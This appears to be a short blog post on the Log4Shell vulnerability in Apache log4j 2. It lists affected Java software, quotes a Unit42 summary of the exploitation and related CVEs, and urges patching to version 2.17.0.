Affected Software
A significant number of Java-based applications are using log4j as their logging utility and are vulnerable to this CVE. To the best of our knowledge, at least the following software may be impacted:
- Apache Struts
- Apache Solr
- Apache Druid
- Apache Flink
- ElasticSearch
- Flume
- Apache Dubbo
- Logstash
- Kafka
- Spring-Boot-starter-log4j2
So you can see that Apache and other software have vulnerabilities due to the Log4J java based software:
“By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct that system to download and subsequently execute a malicious payload. Due to the discovery of this exploit being so recent, there are still many servers, both on-premises and within cloud environments, that have yet to be patched.”
Log4J is used as a logging tool within the java programming language under other software (like Apache) for example here is Apache logging documentation:
it is interesting to note this before one can truly understand how intertwined the Log4J is within many software pieces.
Palo Alto Unit42 also had a good write-up of the cybersecurity issues and it is worthwhile to review their Exec summary:
On Dec. 9, 2021, a remote code execution (RCE) vulnerability in Apache log4j 2 was identified being exploited in the wild. Public proof of concept (PoC) code was released and subsequent investigation revealed that exploitation was incredibly easy to perform. By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct that system to download and subsequently execute a malicious payload. Due to the discovery of this exploit being so recent, there are still many servers, both on-premises and within cloud environments, that have yet to be patched. Like many high severity RCE exploits, thus far, massive scanning activity for CVE-2021-44228 has begun on the internet with the intent of seeking out and exploiting unpatched systems. We highly recommend that organizations upgrade to the latest version (2.17.0) of Apache log4j 2 for all systems. This version also patches the additional vulnerabilities CVE-2021-45046, found on Dec. 14, and CVE-2021-45105, found on Dec. 17.
One immediately notices that there are now 3 CVE’s for similar attacks (Log4J) but the extra scrutiny has caused more vulnerability attacks to be possible.
Another point is that almost immediately after the vulnerability was disclosed there was “massive” activity on the Internet to look for systems to compromise.
Patching your systems is imperative and must be a high priority for you – get my book to get started understanding this phenomenon.
I will be adding to this post as time permits and things change!!